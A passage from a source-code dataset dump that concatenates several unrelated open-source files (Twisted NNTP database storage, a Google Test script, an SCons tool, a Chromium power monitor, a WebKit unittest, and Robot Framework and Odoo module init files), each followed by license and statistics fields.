return defer.succeed((group, self.dbm['groups'][group].articles.keys()))
return defer.fail(NewsServerError("No such group: " + group))
def groupRequest(self, group):
try:
g = self.dbm['groups'][group]
except KeyError:
return defer.fail(NewsServerError("No such group: " + group))
else:
flags = g.flags
low = g.minArticle
high = g.maxArticle
num = high - low + 1
return defer.succeed((group, num, high, low, flags))
def articleExistsRequest(self, id):
return defer.succeed(id in self.dbm['Message-IDs'])
def articleRequest(self, group, index, id = None):
if id is not None:
try:
xref = self.dbm['Message-IDs'][id]
except KeyError:
return defer.fail(NewsServerError("No such article: " + id))
else:
group, index = xref[0]
index = int(index)
try:
a = self.dbm['groups'][group].articles[index]
except KeyError:
return defer.fail(NewsServerError("No such group: " + group))
else:
return defer.succeed((
index,
a.getHeader('Message-ID'),
StringIO.StringIO(a.textHeaders() + '\r\n' + a.body)
))
def headRequest(self, group, index, id = None):
if id is not None:
try:
xref = self.dbm['Message-IDs'][id]
except KeyError:
return defer.fail(NewsServerError("No such article: " + id))
else:
group, index = xref[0]
index = int(index)
try:
a = self.dbm['groups'][group].articles[index]
except KeyError:
return defer.fail(NewsServerError("No such group: " + group))
else:
return defer.succeed((index, a.getHeader('Message-ID'), a.textHeaders()))
def bodyRequest(self, group, index, id = None):
if id is not None:
try:
xref = self.dbm['Message-IDs'][id]
except KeyError:
return defer.fail(NewsServerError("No such article: " + id))
else:
group, index = xref[0]
index = int(index)
try:
a = self.dbm['groups'][group].articles[index]
except KeyError:
return defer.fail(NewsServerError("No such group: " + group))
else:
return defer.succeed((index, a.getHeader('Message-ID'), StringIO.StringIO(a.body)))
class NewsStorageAugmentation:
"""
A NewsStorage implementation using Twisted's asynchronous DB-API
"""
implements(INewsStorage)
schema = """
CREATE TABLE groups (
group_id SERIAL,
name VARCHAR(80) NOT NULL,
flags INTEGER DEFAULT 0 NOT NULL
);
CREATE UNIQUE INDEX group_id_index ON groups (group_id);
CREATE UNIQUE INDEX name_id_index ON groups (name);
CREATE TABLE articles (
article_id SERIAL,
message_id TEXT,
header TEXT,
body TEXT
);
CREATE UNIQUE INDEX article_id_index ON articles (article_id);
CREATE UNIQUE INDEX article_message_index ON articles (message_id);
CREATE TABLE postings (
group_id INTEGER,
article_id INTEGER,
article_index INTEGER NOT NULL
);
CREATE UNIQUE INDEX posting_article_index ON postings (article_id);
CREATE TABLE subscriptions (
group_id INTEGER
);
CREATE TABLE overview (
header TEXT
);
"""
def __init__(self, info):
self.info = info
self.dbpool = adbapi.ConnectionPool(**self.info)
def __setstate__(self, state):
self.__dict__ = state
self.info['password'] = getpass.getpass('Database password for %s: ' % (self.info['user'],))
self.dbpool = adbapi.ConnectionPool(**self.info)
del self.info['password']
def listRequest(self):
# COALESCE may not be totally portable
# it is shorthand for
# CASE WHEN (first parameter) IS NOT NULL then (first parameter) ELSE (second parameter) END
sql = """
SELECT groups.name,
COALESCE(MAX(postings.article_index), 0),
COALESCE(MIN(postings.article_index), 0),
groups.flags
FROM groups LEFT OUTER JOIN postings
ON postings.group_id = groups.group_id
GROUP BY groups.name, groups.flags
ORDER BY groups.name
"""
return self.dbpool.runQuery(sql)
def subscriptionRequest(self):
sql = """
SELECT groups.name FROM groups,subscriptions WHERE groups.group_id = subscriptions.group_id
"""
return self.dbpool.runQuery(sql)
def postRequest(self, message):
cleave = message.find('\r\n\r\n')
headers, article = message[:cleave], message[cleave + 4:]
article = Article(headers, article)
return self.dbpool.runInteraction(self._doPost, article)
def _doPost(self, transaction, article):
# Get the group ids
groups = article.getHeader('Newsgroups').split()
if not len(groups):
raise NNTPError('Missing Newsgroups header')
sql = """
SELECT name, group_id FROM groups
WHERE name IN (%s)
""" % (', '.join([("'%s'" % (adbapi.safe(group),)) for group in groups]),)
transaction.execute(sql)
result = transaction.fetchall()
# No relevant groups, bye bye!
if not len(result):
raise NNTPError('None of groups in Newsgroup header carried')
# Got some groups, now find the indices this article will have in each
sql = """
SELECT groups.group_id, COALESCE(MAX(postings.article_index), 0) + 1
FROM groups LEFT OUTER JOIN postings
ON postings.group_id = groups.group_id
WHERE groups.group_id IN (%s)
GROUP BY groups.group_id
""" % (', '.join([("%d" % (id,)) for (group, id) in result]),)
transaction.execute(sql)
indices = transaction.fetchall()
if not len(indices):
raise NNTPError('Internal server error - no indices found')
# Associate indices with group names
gidToName = dict([(b, a) for (a, b) in result])
gidToIndex = dict(indices)
nameIndex = []
for i in gidToName:
nameIndex.append((gidToName[i], gidToIndex[i]))
# Build xrefs
xrefs = socket.gethostname().split()[0]
xrefs = xrefs + ' ' + ' '.join([('%s:%d' % (group, id)) for (group, id) in nameIndex])
article.putHeader('Xref', xrefs)
# Hey! The article is ready to be posted! God damn f'in finally.
sql = """
INSERT INTO articles (message_id, header, body)
VALUES ('%s', '%s', '%s')
""" % (
adbapi.safe(article.getHeader('Message-ID')),
adbapi.safe(article.textHeaders()),
adbapi.safe(article.body)
)
transaction.execute(sql)
# Now update the posting to reflect the groups to which this belongs
for gid in gidToName:
sql = """
INSERT INTO postings (group_id, article_id, article_index)
VALUES (%d, (SELECT last_value FROM articles_article_id_seq), %d)
""" % (gid, gidToIndex[gid])
transaction.execute(sql)
return len(nameIndex)
def overviewRequest(self):
sql = """
SELECT header FROM overview
"""
return self.dbpool.runQuery(sql).addCallback(lambda result: [header[0] for header in result])
def xoverRequest(self, group, low, high):
sql = """
SELECT postings.article_index, articles.header
FROM articles,postings,groups
WHERE postings.group_id = groups.group_id
AND groups.name = '%s'
AND postings.article_id = articles.article_id
%s
%s
""" % (
adbapi.safe(group),
low is not None and "AND postings.article_index >= %d" % (low,) or "",
high is not None and "AND postings.article_index <= %d" % (high,) or ""
)
return self.dbpool.runQuery(sql).addCallback(
lambda results: [
[id] + Article(header, None).overview() for (id, header) in results
]
)
def xhdrRequest(self, group, low, high, header):
sql = """
SELECT articles.header
FROM groups,postings,articles
WHERE groups.name = '%s' AND postings.group_id = groups.group_id
AND postings.article_index >= %d
AND postings.article_index <= %d
""" % (adbapi.safe(group), low, high)
return self.dbpool.runQuery(sql).addCallback(
lambda results: [
(i, Article(h, None).getHeader(h)) for (i, h) in results
]
)
def listGroupRequest(self, group):
sql = """
SELECT postings.article_index FROM postings,groups
WHERE postings.group_id = groups.group_id
AND groups.name = '%s'
""" % (adbapi.safe(group),)
return self.dbpool.runQuery(sql).addCallback(
lambda results, group = group: (group, [res[0] for res in results])
)
def groupRequest(self, group):
sql = """
SELECT groups.name,
COUNT(postings.article_index),
COALESCE(MAX(postings.article_index), 0),
COALESCE(MIN(postings.article_index), 0),
groups.flags
FROM groups LEFT OUTER JOIN postings
ON postings.group_id = groups.group_id
WHERE groups.name = '%s'
GROUP BY groups.name, groups.flags
""" % (adbapi.safe(group),)
return self.dbpool.runQuery(sql).addCallback(
lambda results: tuple(results[0])
)
def articleExistsRequest(self, id):
sql = """
SELECT COUNT(message_id) FROM articles
WHERE message_id = '%s'
""" % (adbapi.safe(id),)
return self.dbpool.runQuery(sql).addCallback(
lambda result: bool(result[0][0])
)
def articleRequest(self, group, index, id = None):
if id is not None:
sql = """
SELECT postings.article_index, articles.message_id, articles.header, articles.body
FROM groups,postings LEFT OUTER JOIN articles
ON articles.message_id = '%s'
WHERE groups.name = '%s'
AND groups.group_id = postings.group_id
""" % (adbapi.safe(id), adbapi.safe(group))
else:
sql = """
SELECT postings.article_index, articles.message_id, articles.header, articles.body
FROM groups,articles LEFT OUTER JOIN postings
ON postings.article_id = articles.article_id
WHERE postings.article_index = %d
AND postings.group_id = groups.group_id
AND groups.name = '%s'
""" % (index, adbapi.safe(group))
return self.dbpool.runQuery(sql).addCallback(
lambda result: (
result[0][0],
result[0][1],
StringIO.StringIO(result[0][2] + '\r\n' + result[0][3])
)
)
def headRequest(self, group, index):
sql = """
SELECT postings.article_index, articles.message_id, articles.header
FROM groups,articles LEFT OUTER JOIN postings
ON postings.article_id = articles.article_id
WHERE postings.article_index = %d
AND postings.group_id = groups.group_id
AND groups.name = '%s'
""" % (index, adbapi.safe(group))
return self.dbpool.runQuery(sql).addCallback(lambda result: result[0])
def bodyRequest(self, group, index):
sql = """
SELECT postings.article_index, articles.message_id, articles.body
FROM groups,articles LEFT OUTER JOIN postings
ON postings.article_id = articles.article_id
WHERE postings.article_index = %d
AND postings.group_id = groups.group_id
AND groups.name = '%s'
""" % (index, adbapi.safe(group))
return self.dbpool.runQuery(sql).addCallback(
lambda result: result[0]
).addCallback(
lambda (index, id, body): (index, id, StringIO.StringIO(body))
)
####
#### XXX - make these static methods some day
####
def makeGroupSQL(groups):
res = ''
for g in groups:
res = res + """\n INSERT INTO groups (name) VALUES ('%s');\n""" % (adbapi.safe(g),)
return res
def makeOverviewSQL():
res = ''
for o in OVERVIEW_FMT:
res = res + """\n INSERT INTO overview (header) VALUES ('%s');\n""" % (adbapi.safe(o),)
return res
| apache-2.0 | -6,870,076,587,363,132,000 | 1,682,258,409,642,480,600 | 31.105614 | 122 | 0.568266 | false |
Dellware78/mtasa-blue | vendor/google-breakpad/src/third_party/protobuf/protobuf/gtest/test/gtest_throw_on_failure_test.py | 2917 | 5766 | #!/usr/bin/env python
#
# Copyright 2009, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Tests Google Test's throw-on-failure mode with exceptions disabled.
This script invokes gtest_throw_on_failure_test_ (a program written with
Google Test) with different environments and command line flags.
"""
__author__ = '[email protected] (Zhanyong Wan)'
import os
import gtest_test_utils
# Constants.
# The command line flag for enabling/disabling the throw-on-failure mode.
THROW_ON_FAILURE = 'gtest_throw_on_failure'
# Path to the gtest_throw_on_failure_test_ program, compiled with
# exceptions disabled.
EXE_PATH = gtest_test_utils.GetTestExecutablePath(
'gtest_throw_on_failure_test_')
# Utilities.
def SetEnvVar(env_var, value):
"""Sets an environment variable to a given value; unsets it when the
given value is None.
"""
env_var = env_var.upper()
if value is not None:
os.environ[env_var] = value
elif env_var in os.environ:
del os.environ[env_var]
def Run(command):
"""Runs a command; returns True/False if its exit code is/isn't 0."""
print 'Running "%s". . .' % ' '.join(command)
p = gtest_test_utils.Subprocess(command)
return p.exited and p.exit_code == 0
# The tests. TODO([email protected]): refactor the class to share common
# logic with code in gtest_break_on_failure_unittest.py.
class ThrowOnFailureTest(gtest_test_utils.TestCase):
"""Tests the throw-on-failure mode."""
def RunAndVerify(self, env_var_value, flag_value, should_fail):
"""Runs gtest_throw_on_failure_test_ and verifies that it does
(or does not) exit with a non-zero code.
Args:
env_var_value: value of the GTEST_BREAK_ON_FAILURE environment
variable; None if the variable should be unset.
flag_value: value of the --gtest_break_on_failure flag;
None if the flag should not be present.
should_fail: True iff the program is expected to fail.
"""
SetEnvVar(THROW_ON_FAILURE, env_var_value)
if env_var_value is None:
env_var_value_msg = ' is not set'
else:
env_var_value_msg = '=' + env_var_value
if flag_value is None:
flag = ''
elif flag_value == '0':
flag = '--%s=0' % THROW_ON_FAILURE
else:
flag = '--%s' % THROW_ON_FAILURE
command = [EXE_PATH]
if flag:
command.append(flag)
if should_fail:
should_or_not = 'should'
else:
should_or_not = 'should not'
failed = not Run(command)
SetEnvVar(THROW_ON_FAILURE, None)
msg = ('when %s%s, an assertion failure in "%s" %s cause a non-zero '
'exit code.' %
(THROW_ON_FAILURE, env_var_value_msg, ' '.join(command),
should_or_not))
self.assert_(failed == should_fail, msg)
def testDefaultBehavior(self):
"""Tests the behavior of the default mode."""
self.RunAndVerify(env_var_value=None, flag_value=None, should_fail=False)
def testThrowOnFailureEnvVar(self):
"""Tests using the GTEST_THROW_ON_FAILURE environment variable."""
self.RunAndVerify(env_var_value='0',
flag_value=None,
should_fail=False)
self.RunAndVerify(env_var_value='1',
flag_value=None,
should_fail=True)
def testThrowOnFailureFlag(self):
"""Tests using the --gtest_throw_on_failure flag."""
self.RunAndVerify(env_var_value=None,
flag_value='0',
should_fail=False)
self.RunAndVerify(env_var_value=None,
flag_value='1',
should_fail=True)
def testThrowOnFailureFlagOverridesEnvVar(self):
"""Tests that --gtest_throw_on_failure overrides GTEST_THROW_ON_FAILURE."""
self.RunAndVerify(env_var_value='0',
flag_value='0',
should_fail=False)
self.RunAndVerify(env_var_value='0',
flag_value='1',
should_fail=True)
self.RunAndVerify(env_var_value='1',
flag_value='0',
should_fail=False)
self.RunAndVerify(env_var_value='1',
flag_value='1',
should_fail=True)
if __name__ == '__main__':
gtest_test_utils.Main()
| gpl-3.0 | 8,861,283,259,795,622,000 | -5,521,466,778,592,229,000 | 32.719298 | 79 | 0.656261 | false |
gladk/palabos | scons/scons-local-2.1.0/SCons/Tool/sgicc.py | 21 | 1878 | """SCons.Tool.sgicc
Tool-specific initialization for MIPSPro cc on SGI.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/sgicc.py 5357 2011/09/09 21:31:03 bdeegan"
import cc
def generate(env):
"""Add Builders and construction variables for gcc to an Environment."""
cc.generate(env)
env['CXX'] = 'CC'
env['SHOBJSUFFIX'] = '.o'
env['STATIC_AND_SHARED_OBJECTS_ARE_THE_SAME'] = 1
def exists(env):
return env.Detect('cc')
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| agpl-3.0 | 5,933,395,459,477,644,000 | 6,928,681,499,985,229,000 | 34.433962 | 101 | 0.741747 | false |
hujiajie/chromium-crosswalk | tools/telemetry/telemetry/internal/platform/power_monitor/cros_power_monitor.py | 17 | 6081 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import collections
import logging
import re
from telemetry import decorators
from telemetry.internal.platform.power_monitor import sysfs_power_monitor
class CrosPowerMonitor(sysfs_power_monitor.SysfsPowerMonitor):
"""PowerMonitor that relies on 'dump_power_status' to monitor power
consumption of a single ChromeOS application.
"""
def __init__(self, platform_backend):
"""Constructor.
Args:
platform_backend: A LinuxBasedPlatformBackend object.
Attributes:
_initial_power: The result of 'dump_power_status' before the test.
_start_time: The epoch time at which the test starts executing.
"""
super(CrosPowerMonitor, self).__init__(platform_backend)
self._initial_power = None
self._start_time = None
@decorators.Cache
def CanMonitorPower(self):
return super(CrosPowerMonitor, self).CanMonitorPower()
def StartMonitoringPower(self, browser):
super(CrosPowerMonitor, self).StartMonitoringPower(browser)
if self._IsOnBatteryPower():
sample = self._platform.RunCommand(['dump_power_status;', 'date', '+%s'])
self._initial_power, self._start_time = CrosPowerMonitor.SplitSample(
sample)
else:
logging.warning('Device not on battery power during power monitoring. '
'Results may be incorrect.')
def StopMonitoringPower(self):
# Don't need to call self._CheckStop here; it's called by the superclass
cpu_stats = super(CrosPowerMonitor, self).StopMonitoringPower()
power_stats = {}
if self._IsOnBatteryPower():
sample = self._platform.RunCommand(['dump_power_status;', 'date', '+%s'])
final_power, end_time = CrosPowerMonitor.SplitSample(sample)
# The length of the test is used to measure energy consumption.
length_h = (end_time - self._start_time) / 3600.0
power_stats = CrosPowerMonitor.ParsePower(self._initial_power,
final_power, length_h)
else:
logging.warning('Device not on battery power during power monitoring. '
'Results may be incorrect.')
return CrosPowerMonitor.CombineResults(cpu_stats, power_stats)
@staticmethod
def SplitSample(sample):
"""Splits a power and time sample into the two separate values.
Args:
sample: The result of calling 'dump_power_status; date +%s' on the
device.
Returns:
A tuple of power sample and epoch time of the sample.
"""
sample = sample.strip()
index = sample.rfind('\n')
power = sample[:index]
time = sample[index + 1:]
return power, int(time)
@staticmethod
def IsOnBatteryPower(status, board):
"""Determines if the devices is being charged.
Args:
status: The parsed result of 'dump_power_status'
board: The name of the board running the test.
Returns:
True if the device is on battery power; False otherwise.
"""
on_battery = status['line_power_connected'] == '0'
# Butterfly can incorrectly report AC online for some time after unplug.
# Check battery discharge state to confirm.
if board == 'butterfly':
on_battery |= status['battery_discharging'] == '1'
return on_battery
def _IsOnBatteryPower(self):
"""Determines if the device is being charged.
Returns:
True if the device is on battery power; False otherwise.
"""
status = CrosPowerMonitor.ParsePowerStatus(
self._platform.RunCommand(['dump_power_status']))
board_data = self._platform.RunCommand(['cat', '/etc/lsb-release'])
board = re.search('BOARD=(.*)', board_data).group(1)
return CrosPowerMonitor.IsOnBatteryPower(status, board)
@staticmethod
def ParsePowerStatus(sample):
"""Parses 'dump_power_status' command output.
Args:
sample: The output of 'dump_power_status'
Returns:
Dictionary containing all fields from 'dump_power_status'
"""
rv = collections.defaultdict(dict)
for ln in sample.splitlines():
words = ln.split()
assert len(words) == 2
rv[words[0]] = words[1]
return dict(rv)
@staticmethod
def ParsePower(initial_stats, final_stats, length_h):
"""Parse output of 'dump_power_status'
Args:
initial_stats: The output of 'dump_power_status' before the test.
final_stats: The output of 'dump_power_status' after the test.
length_h: The length of the test in hours.
Returns:
Dictionary in the format returned by StopMonitoringPower().
"""
initial = CrosPowerMonitor.ParsePowerStatus(initial_stats)
final = CrosPowerMonitor.ParsePowerStatus(final_stats)
# The charge value reported by 'dump_power_status' is not precise enough to
# give meaningful results across shorter tests, so average energy rate and
# the length of the test are used.
initial_power_mw = float(initial['battery_energy_rate']) * 10 ** 3
final_power_mw = float(final['battery_energy_rate']) * 10 ** 3
average_power_mw = (initial_power_mw + final_power_mw) / 2.0
# Duplicating CrOS battery fields where applicable.
def CopyFinalState(field, key):
"""Copy fields from battery final state."""
if field in final:
battery[key] = float(final[field])
battery = {}
CopyFinalState('battery_charge_full', 'charge_full')
CopyFinalState('battery_charge_full_design', 'charge_full_design')
CopyFinalState('battery_charge', 'charge_now')
CopyFinalState('battery_current', 'current_now')
CopyFinalState('battery_energy', 'energy')
CopyFinalState('battery_energy_rate', 'energy_rate')
CopyFinalState('battery_voltage', 'voltage_now')
return {'identifier': 'dump_power_status',
'power_samples_mw': [initial_power_mw, final_power_mw],
'energy_consumption_mwh': average_power_mw * length_h,
'component_utilization': {'battery': battery}}
| bsd-3-clause | 6,197,737,673,767,238,000 | 6,857,741,420,832,155,000 | 36.079268 | 79 | 0.672587 | false |
dongritengfei/phantomjs | src/qt/qtwebkit/Tools/Scripts/webkitpy/tool/bot/botinfo_unittest.py | 121 | 2047 | # Copyright (c) 2011 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest2 as unittest
from webkitpy.tool.bot.botinfo import BotInfo
from webkitpy.tool.mocktool import MockTool
from webkitpy.common.net.statusserver_mock import MockStatusServer
from webkitpy.port.test import TestPort
class BotInfoTest(unittest.TestCase):
def test_summary_text(self):
tool = MockTool()
tool.status_server = MockStatusServer("MockBotId")
self.assertEqual(BotInfo(tool, 'port-name').summary_text(), "Bot: MockBotId Port: port-name Platform: MockPlatform 1.0")
| bsd-3-clause | 3,395,046,546,986,176,500 | 8,590,087,076,291,345,000 | 47.738095 | 130 | 0.776746 | false |
edbrannin/Robotframework-SQLAlchemy-Library | src/SQLAlchemyLibrary/__init__.py | 1 | 2769 | # Copyright (c) 2010 Franz Allan Valencia See
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from SQLAlchemyLibrary.connection_manager import ConnectionManager
from SQLAlchemyLibrary.query import Query
from SQLAlchemyLibrary.assertion import Assertion
__version_file_path__ = os.path.join(os.path.dirname(__file__), 'VERSION')
__version__ = open(__version_file_path__, 'r').read().strip()
class SQLAlchemyLibrary(ConnectionManager, Query, Assertion):
"""
SQLAlchemy Library allows you to interact with your database in Robot Framework tests.
This can allow you to query your database after an action has been made to verify the results.
This can use any database supported by SQLAlchemy, including Oracle, MySQL, Postgres, SQLite.
(Not yet tested on Oracle).
This should be a drop-in replacement for DatabaseLibrary in most situations.
Advantages over DatabaseLibrary
- Ability to provide named-parameter BIND values
== References: ==
- SQLAlchemy documentation - http://docs.sqlalchemy.org/en/latest/index.html
- List of SQLAlchemy Dialects - http://docs.sqlalchemy.org/en/latest/dialects/
- Python Database Programming - http://wiki.python.org/moin/DatabaseProgramming/
== Notes: ==
=== Example Usage: ===
| # Setup |
| Connect to Database |
| # Guard assertion (verify that test started in expected state). |
| Check if not exists in database | select id from person where first_name = :first_name and last_name = :last_name | firat_name=Franz Allan | last_name=See |
| # Drive UI to do some action |
| Go To | http://localhost/person/form.html | | # From selenium library |
| Input Text | name=first_name | Franz Allan | # From selenium library |
| Input Text | name=last_name | See | # From selenium library |
| Click Button | Save | | # From selenium library |
| # Log results |
| @{queryResults} | Query | select * from person |
| Log Many | @{queryResults} |
| # Verify if persisted in the database |
| Check if exists in database | select id from person where first_name = 'Franz Allan' and last_name = 'See' |
| # Teardown |
| Disconnect from Database |
"""
ROBOT_LIBRARY_SCOPE = 'GLOBAL'
| apache-2.0 | -1,758,234,698,115,044,600 | -8,969,978,495,616,452,000 | 39.130435 | 162 | 0.701697 | false |
sv-dev1/odoo | addons/mrp_repair/__init__.py | 380 | 1087 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import mrp_repair
import wizard
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | 2,144,954,692,983,241,000 | 2,576,444,078,874,443,300 | 42.48 | 79 | 0.612695 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.